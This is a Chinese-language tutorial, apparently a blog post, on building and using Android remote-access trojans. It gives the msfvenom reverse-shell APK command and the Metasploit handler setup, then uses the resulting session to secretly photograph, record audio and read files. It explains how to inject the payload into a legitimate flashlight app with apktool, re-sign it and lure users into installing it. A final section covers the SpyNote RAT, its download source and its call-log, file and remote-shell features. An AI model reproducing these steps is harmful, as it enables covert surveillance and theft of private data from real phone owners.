Kali平臺(Hack):192.168.0.101
Android模擬器(靶機1):192.168.0.106
Android魅族note2手機(靶機2):192.168.0.104
Java環境,.net環境構建 。(spyNote軟體需要環境)
2.環境配置二Android模擬器2.1首先從官網上下載雷電模擬器
2.2下載完後。點擊.exe文件直接運行安裝,運行,下一步,直接完成安裝。
2.3 安裝完成後在電腦桌面顯示下面logo
2.4 對模擬器網絡進行配置在右邊的設置裡面選擇設置>網絡設置>網絡橋接模式開啟,ip設置dhcp,最下面點擊安裝:
2.5 安裝成功後顯示安裝成功:
3.生成後門
3.1打開虛擬機,啟動kali,打開終端,生成apk後門。lhost為windows的ip(可以根據自己的IP設定),lport指定一個埠5001。打開終端輸入命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.101 lport=5001 R > /etc/222.apk
(生成apk文件)
3.2生成文件後我們到/etc/222.apk目錄下拷貝我們的apk文件到我們的windows平臺下然後啟動我們的雷電模擬器,點擊啟動:
(啟動界面)
3.3在右下角有個apk,點擊選擇文件安裝。
3.4然後為了測試我們使用模擬器安裝apk文件:
(成功安裝木馬文件)
4 使用metasploit控制臺對模擬器進行攻擊:4.1 啟動metasploit:
(啟動界面)
4.2 使用模塊:use exploit/multi/handler
(設置exploit)
4.3 設置模塊set payload android/meterpreter/reverse_tcp
(paload設置)
4.4 設置攻擊機和埠號和啟動:
(參數配置)
4.5 顯示正在監聽靶機:
(監聽中)
4.6 回到我們的模擬器靶機,我們點擊運行我們安裝的文件
(雙擊運行)
4.7 看到成功返回shell
(返回shell)
4.8 查看模擬手機的版本信息:sysinfo
(手機作業系統信息)
4.9 返回我們的模擬器,啟動虛擬終端,查看攻擊機和靶機的建立的聯繫:
(靶機被控的聯繫)
5 啟用真機測試5.1 步驟如以上環境,我在自己的手機上安裝這個apk文件:
(note2手機安裝)
5.2 按照上面獲取shell的方法成功連接真機.:
(連接真機成功)
5.3 手機攻擊演示:獲取版本信息:
(手機版本信息)
5.4查看網絡信息:(ifconfig)
(手機網絡狀態)
5.5查看root狀態:
(顯示手機未root)
5.6 啟用網頁視屏聊天:
(手機未找到合適的瀏覽器打開)
5.7查看手機有幾個攝像頭
(顯示有2個)
5.8進行調用攝像頭偷拍(默認前置攝像頭):
5.9網頁攝像機視屏流,顯示實時畫面能夠調用攝像頭,實時觀看被攻擊者的像機對著的物體,以下為通過此辦法獲取到的一段圖片資料:
5.10 進行錄音操作:
(成功錄音並保存)
5.11 獲得shell後有很多的攻擊方法,我就不一一操作,將其匯總如下:
(網絡和系統信息獲取)
(系統命令執行和攝像頭操作)
6 遠控升級之捆綁app:說明:現實生活中沒有人會傻乎乎的下載個木馬apk文件呀,所以我們的通過一些偽裝的辦法,將apk木馬文件捆綁在用戶常用的App上,誘導用戶下載使用。步驟如下:先捋一下思路,把PAYLOAD小馬注入到一個目標apk文件中,關鍵是要找到目標APK的入口,並把啟動payload小馬的代碼添加進去,隨目標APK一起啟動,從而實現監聽手機的目的。當然前提是apk文件可逆。這裡使用注入目標apk文件:手電筒—-魅族市場下載的(名為shoudiantong.apk)。我們使用上文攻擊魅族手機用到的222.apk文件。
6.1 反編譯payload小馬222.apk和shoudiantong.apk(說明:反編譯軟體kali系統中自帶,以下操作在windows,所以需要下載一個apktool。
命令:
apktool d houmen.apk
apktool d shoudiantong.apk
(反編譯生成兩個新文件)
6.2 開始尋找手電筒shoudiantong.apk文件的入口,在手電筒shoudiantong的Manifest.xml文件中查找Main和Launch關鍵詞,定位到所對應的啟動smail文件
6.3 直接搜索onCreat函數,找到bundle對象,你並在下面添加啟動paload添加如下代碼:(改動文件:MainActivety.smail)
6.4 點擊保存之後呢,我們還要把剛才反編譯的payload文件中的smail代碼複製過來,把payload的smail/com/metasploit文件複製到手電筒的smail/com/目錄下。
6.5 回編譯:apktool b shoudiantong.apk
6.6 籤名,這一部需要完成,發現沒有籤名的apk文件安裝時會解析錯誤,生成KEYSTORE:keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity 22222因為我在本機沒有這個工具,所以在kali系統完成:
6.7 給shoudiantong.apk籤名:
6.8 Shoudiantong.apk木馬文件測試,將手電筒apk文件裝在手機上:
6.9 打開並正常使用完全沒問題:
7 進行手機攻擊
7.1 查看手機與攻擊機建立的聯繫
7.2 試著操作一些上述沒有操作過的命令試試:
7.3 查看路由信息:
7.4 ps查看進程:
8 總結:
通過對手機木馬文件對手機的植入,我們可以成功的對手機進行控制,其中包括對手機使用者進行錄音、拍照、查看下載手機私密文件,獲取手機網絡信息,進程信息等。實現對手機的完全控制。本文簡單介紹如何將木馬文件綁定到正常app實現對受害者攻擊,其實還有很多辦法,如通過中間人、釣魚實現木馬植入等。
9 圖形界面控制軟體SpyNote的使用:10 環境配置三java環境和.net環境:11 spynote安裝使用11.1百度搜索「spynote下載」找到相應的安裝包,或者訪問地址:(http://www.rekings.com/spynote-v5-android-rat/)進行下載下載後使用解壓密碼:rekings.com打開:
11.2 雙擊運行軟體出現以下界面填寫一個大於1023的埠,默認2222
(填寫埠)
11.3配置生成木馬apk文件我這裡配置埠:222我們的攻擊機為:192.168.0.100也就是我計算機的ip,然後應用的名字test,點擊上方的build就可以生成文件:
11.4演示過程涉及一些個人隱私,所以在演示的過程中我們用上面實驗中用到的手機模擬器來代替打開我們的雷電模擬器,點擊右下角的apk安裝,把我們生成的apk文件安裝(test.apk文件默認放在C:\Administrator\output):
(安裝apk文件)
12 攻擊演示:12.1 回到spyNote軟體,我們發現有一臺機器成功上線:
12.2 在設備上右擊選擇 tools P依次有一些命令執行:
(攻擊方式)
12.3 我們選擇tools p>record calls得到手機的通話記錄
(通話記錄)
12.4 我們選擇tools p>record calls得到手機的通話記錄install aplications查看手機的安裝的應用軟體:
(安裝的軟體)
12.5 我們選擇tools p>file managerke可以查看手機裡面的文件,可以任意下載,拷貝,刪除等等。
(文件管理)
12.6 我們選擇tools p>romote commands可以進行遠程終端管理:
(遠程終端管理)
13 總結:功能太多,不一一演示,其中還包括照相、監聽電話聲音、查看通訊錄、發送簡訊等等一些功能,等於自己手機咯都不用買手機